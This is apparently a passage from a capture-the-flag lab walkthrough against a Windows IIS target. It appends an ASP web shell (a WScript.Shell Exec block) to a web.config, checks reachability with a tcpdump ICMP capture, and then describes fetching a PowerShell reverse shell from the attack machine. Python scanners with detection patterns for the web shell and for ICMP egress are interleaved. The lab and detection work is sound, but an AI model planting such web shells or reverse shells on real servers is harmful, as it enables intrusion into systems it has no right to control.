Based on what we found earlier, we know the server will execute ASP code: the arithmetic expression we injected was evaluated on the page we loaded before. Let's upload a shell.
Executing Commands via created script
Create a file called web.aspx with the following code.
<%
' Instantiate the Windows scripting shell COM object
Set rs = CreateObject("WScript.Shell")
' Exec spawns a process; the command string is left blank in the original
Set cmd = rs.Exec("")
' Read everything the process wrote to stdout
o = cmd.StdOut.Readall()
' Echo the captured output into the HTTP response
Response.write(o)
%>
Next, add that code to the end of the config file we created earlier.
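From the defender's side, the artifact this step leaves behind is a web.config with executable code appended after the closing root element. The following scanner is an added example and not code from the walkthrough: it flags content trailing `</configuration>` and any `<% ... %>` render block that reaches for `WScript.Shell`, `.Exec`/`.Run` or `Response.Write`. Both sample configs are constructed here, and the command string in the suspicious one is a placeholder.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a web.config with an ASP render block appended after the
# closing </configuration> tag, the shape described in the walkthrough above.
# The command string is a placeholder, not a real command.
SUSPICIOUS_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
  </system.webServer>
</configuration>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("PLACEHOLDER_COMMAND")
o = cmd.StdOut.Readall()
Response.write(o)
%>
"""

# Constructed sample: a benign web.config with nothing after the root element.
CLEAN_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
  </system.webServer>
</configuration>
"""

# <% ... %> render blocks; <%@ ... %> page directives are deliberately excluded.
RENDER_BLOCK = re.compile(r"<%(?!@)(.*?)%>", re.DOTALL)

# Primitives that turn a render block into a command shell.
PRIMITIVES = {
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.IGNORECASE),
    "process_exec": re.compile(r"\.\s*(?:Exec|Run)\s*\(", re.IGNORECASE),
    "output_echo": re.compile(r"Response\.Write\s*\(", re.IGNORECASE),
}


@dataclass
class Finding:
    reason: str
    snippet: str


def trailing_content(config: str) -> Optional[str]:
    """Return whatever follows </configuration>; a well-formed file has nothing there."""
    m = re.search(r"</configuration>", config, re.IGNORECASE)
    if m is None:
        return None
    tail = config[m.end():].strip()
    return tail or None


def scan_config(config: str) -> List[Finding]:
    """Flag appended content and any render block that uses a process-spawning object."""
    findings: List[Finding] = []
    tail = trailing_content(config)
    if tail is not None:
        findings.append(Finding("content after </configuration>", tail[:60]))
    for block in RENDER_BLOCK.finditer(config):
        body = block.group(1)
        hits = [name for name, rx in PRIMITIVES.items() if rx.search(body)]
        if hits:
            findings.append(Finding("render block uses " + ", ".join(hits), body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for label, cfg in (("clean", CLEAN_CONFIG), ("suspicious", SUSPICIOUS_CONFIG)):
        print(label, [f.reason for f in scan_config(cfg)])
```

Run it against files in an upload directory or as a pre-commit check on deployed configs; the "content after </configuration>" finding alone is enough to quarantine a file, since a valid web.config never has anything past its root element.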
Set up an ICMP listener on our attack machine to see whether the server can reach us.
kali@kali:~$ sudo tcpdump -i tun0 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
14:10:37.180009 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 1, length 40
14:10:37.180028 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
14:10:38.187828 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 2, length 40
14:10:38.187846 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
14:10:39.185159 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 3, length 40
14:10:39.185177 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
14:10:40.184495 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 4, length 40
14:10:40.184509 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
The server is communicating with us. That is good news.
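The same capture format tells a defender something too: a web server that starts sending ICMP echo requests to an address outside its own network is a common sign of a connectivity check like the one above. The parser and check below are an added example, not part of the walkthrough. The capture is constructed from the lines shown above (banner lines included, so the parser demonstrates skipping them), and the "internal" range 10.10.10.0/24 is an assumption for this example.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed sample in the same format as the tcpdump output above.
SAMPLE_CAPTURE = """\
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
14:10:37.180009 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 1, length 40
14:10:37.180028 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 1, length 40
14:10:38.187828 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 2, length 40
14:10:38.187846 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 2, length 40
14:10:39.185159 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 3, length 40
14:10:39.185177 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 3, length 40
14:10:40.184495 IP 10.10.10.93 > 10.10.14.34: ICMP echo request, id 1, seq 4, length 40
14:10:40.184509 IP 10.10.14.34 > 10.10.10.93: ICMP echo reply, id 1, seq 4, length 40
"""

# One tcpdump ICMP echo line; banner and non-echo lines will not match.
LINE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+), length (?P<len>\d+)$"
)

# Assumed for this example: the server's own subnet is the only internal range.
INTERNAL_NETS = [ipaddress.ip_network("10.10.10.0/24")]


@dataclass
class Echo:
    ts: float        # seconds since midnight (capture assumed not to cross midnight)
    src: str
    dst: str
    kind: str        # "request" or "reply"
    icmp_id: int
    seq: int


def parse_capture(text: str) -> List[Echo]:
    """Parse tcpdump ICMP echo lines into records, skipping anything else."""
    echos: List[Echo] = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if m is None:
            continue
        h, mi, s = m["ts"].split(":")
        ts = int(h) * 3600 + int(mi) * 60 + float(s)
        echos.append(Echo(ts, m["src"], m["dst"], m["kind"], int(m["id"]), int(m["seq"])))
    return echos


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def egress_echo_requests(echos: List[Echo], monitored: Set[str]) -> Dict[Tuple[str, str], Dict[str, float]]:
    """Group echo *requests* that a monitored server sends to a non-internal host.

    Returns {(src, dst): {"count": n, "mean_interval": seconds}} so a regular
    one-per-second pattern, as in the capture above, stands out.
    """
    stamps: Dict[Tuple[str, str], List[float]] = {}
    for e in echos:
        if e.kind != "request" or e.src not in monitored or is_internal(e.dst):
            continue
        stamps.setdefault((e.src, e.dst), []).append(e.ts)
    report: Dict[Tuple[str, str], Dict[str, float]] = {}
    for key, times in stamps.items():
        gaps = [b - a for a, b in zip(times, times[1:])]
        report[key] = {
            "count": len(times),
            "mean_interval": sum(gaps) / len(gaps) if gaps else 0.0,
        }
    return report


if __name__ == "__main__":
    for (src, dst), stats in egress_echo_requests(parse_capture(SAMPLE_CAPTURE), {"10.10.10.93"}).items():
        print(f"{src} -> {dst}: {stats['count']} echo requests, ~{stats['mean_interval']:.2f}s apart")
```

Feed it `tcpdump -l icmp` output from a sensor on the server segment (or the equivalent flow records) with the set of web servers as `monitored`; a web server has no normal reason to ping arbitrary external hosts, so even a handful of requests is worth an alert.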
Establishing Reverse Shell
At the bottom of the shell.ps1 script, set up your listener with the following code.
Modified config file that will download our shell. This creates an object instance of a Windows shell. Then we use this instance to invoke PowerShell in order to download the PowerShell TCP shell from our attack machine.